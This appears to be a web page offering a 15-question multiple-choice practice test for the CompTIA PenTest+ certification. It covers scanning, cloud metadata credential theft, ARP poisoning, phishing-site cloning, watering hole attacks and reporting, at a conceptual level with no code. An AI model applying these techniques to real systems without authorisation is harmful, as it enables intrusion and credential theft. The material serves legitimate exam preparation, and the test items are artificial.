00:15:00

Free CompTIA PenTest+ PT0-002 Practice Test

Prepare for the CompTIA PenTest+ PT0-002 exam with this free practice test. Randomly generated and customizable, this test allows you to choose the number of questions.

  • Questions: 15
  • Time: 15 minutes (60 seconds per question)
  • Included Objectives:
    • Planning and Scoping
    • Information Gathering and Vulnerability Scanning
    • Attacks and Exploits
    • Reporting and Communication
    • Tools and Code Analysis
Question 1 of 15

Tokens issued by a server during a session can be scoped strictly enough to prevent interception and reuse by an unauthorized party.

  • False

  • True

Question 2 of 15

Given that you are conducting an internal penetration test and need to enumerate assets within the organization’s network, which Nmap command or script would you use to produce the most comprehensive list of live hosts, open ports, and services?

  • --top-ports 100

  • -Pn

  • -sV -O --script=all

  • -sn

Question 3 of 15

Which scanner is most effective for testing web applications for potential vulnerabilities such as SQL injection, Cross-Site Scripting (XSS), and file inclusion?

  • Nessus

  • Open vulnerability assessment scanner (OpenVAS)

  • OWASP ZAP

  • Nmap

Question 4 of 15

A penetration tester can capture and analyze all network traffic passing through a switch by simply connecting to any of its ports without additional configurations.

  • False

  • True

Question 5 of 15

In a red team exercise against a company's cloud infrastructure, you discover that the Elastic Compute Cloud (EC2) instances are configured to allow any attached role to access the instance metadata service without restrictions. With this misconfiguration in mind, what sophisticated technique should be used to carry out an attack that leverages the instance metadata service to gain escalated privileges within the cloud environment?

  • Engage in Kerberoasting to steal Kerberos tickets from the EC2 instances and gain access to the metadata service.

  • Use NTLM relay attacks to capture authentication details and replay them against the metadata service for escalated cloud privileges.

  • Execute a Direct-to-Origin attack by accessing the instance metadata service directly to retrieve security credentials for IAM role escalation.

  • Perform a VLAN hopping attack to bypass network segmentation and access the metadata service from a compromised instance within the same VLAN.

Question 6 of 15

You have completed a penetration test for a large financial organization and are required to share the final report containing sensitive vulnerability details with multiple stakeholders. Which method should you use to distribute the report securely, as per best practices?

  • Uploading the report to a password-protected public website where stakeholders can download it.

  • Encrypting the report and sending it via an encrypted email service, accessible only to authorized stakeholders with the decryption key.

  • Storing the report on a cloud service without implementing user-specific access controls.

  • Sending the report via standard email with no encryption.

  • Posting direct download links to the report on a private forum frequented by the stakeholders.

  • Distributing physical copies of the report in sealed envelopes via courier services.

Question 7 of 15

During a penetration test, you are tasked with crafting a phishing campaign to test the organization's resilience to social engineering efforts. Using the Social Engineering Toolkit, which of the following would be the BEST approach to emulate a realistic spear-phishing attack?

  • Modify the organization's public website to redirect to your malicious site.

  • Clone a known trusted site and slightly modify it to collect user credentials.

  • Replicate an exact copy of their public website to confuse employees.

  • Send out generic business-related documents that contain no organization-specific information.

Question 8 of 15

Which of the following best describes the purpose of the CVE system?

  • A standardized list of identified cybersecurity vulnerabilities

  • A system for fixing and patching cybersecurity flaws

  • A ranking system for the severity of cybersecurity threats

  • A specific type of cybersecurity vulnerability exploit

Question 9 of 15

During a penetration test, you have been tasked with executing a watering hole attack against a company's employees who routinely visit industry-specific forums and web resources. Before launching the attack, what is the most crucial step to ensure the success of the operation?

  • Cracking the Wi-Fi encryption used by the company's employees

  • Conducting reconnaissance to identify the websites most frequently visited by the target group

  • Monitoring network traffic to capture employee credentials

  • Updating malware signatures to ensure non-detection by antivirus software

Question 10 of 15

During a penetration test, you observe that a network device is continuously broadcasting requests to identify the hardware address corresponding to a known network address. Seeking to intercept and alter the communication between this device and another server within the same broadcast domain, which method would be most suitable for inserting yourself into their communication stream?

  • Deploying an unauthorized DHCP server to reroute traffic through your machine

  • Capturing packets passively to analyze traffic without sending any of your own

  • Introducing forged address resolution protocol responses to bind your hardware address with the server's network address

  • Flooding the network with traffic to prevent legitimate communications from occurring

Question 11 of 15

Which of the following options is the BEST method to identify assets hosted in the cloud as part of an organization's infrastructure during a penetration test?

  • Reviewing job listings from the organization to infer cloud services in use.

  • Utilizing traditional network scanners to scan IP ranges owned by the organization.

  • Employing cloud service discovery tools designed to query cloud provider APIs and enumerate resources.

  • Conducting wardriving around the vicinity of the organization's physical location.

Question 12 of 15

When conducting a penetration test, which of the following best describes a scenario where Ettercap is MOST effective?

  • Creating an encrypted reverse shell to secure the communication channel with a compromised host.

  • ARP poisoning to intercept and modify traffic between two systems on a local network.

  • Exploiting misconfigured server-side request forgery (SSRF) vulnerabilities.

  • Code signing to ensure the integrity and origin of the software to be installed.

Question 13 of 15

Which of the following outcomes of manually inspecting web links indicates the highest risk and should be prioritized for further investigation during a penetration testing engagement?

  • Finding several web links that are mislabeled leading to pages with different content than expected.

  • Discovery of server-side scripts that are not executed but can be downloaded through a web link.

  • Uncovering personal data that appears to be used for test purposes in the development version of the site.

  • Discovery of backup files containing source code and database credentials left in a directory accessible through a web link.

Question 14 of 15

During a penetration testing contract, the client has specifically requested an evaluation of existing physical security measures. Your assessment reveals that the current video surveillance system only covers entry and exit points but does not monitor the server room, which houses critical infrastructure. When compiling your findings report, how should this observation be presented to the client?

  • Upgrading the resolution of current cameras to capture clearer imagery

  • Maintaining the current surveillance setup since it adequately covers all necessary areas

  • A recommendation for increasing surveillance to include critical areas such as the server room

  • Reducing the hours of surveillance to conserve resources during business hours

Question 15 of 15

During a penetration test, you have identified that an organization's web application is vulnerable to SQL injection attacks. Which of the following recommendations would be most effective in mitigating this risk?

  • Keep the web server and database server software up to date through regular patch management

  • Sanitize user input and utilize parameterized queries

  • Enforce strong password requirements for all application users

  • Implement multifactor authentication for user logins

  • Encrypt passwords stored within the application database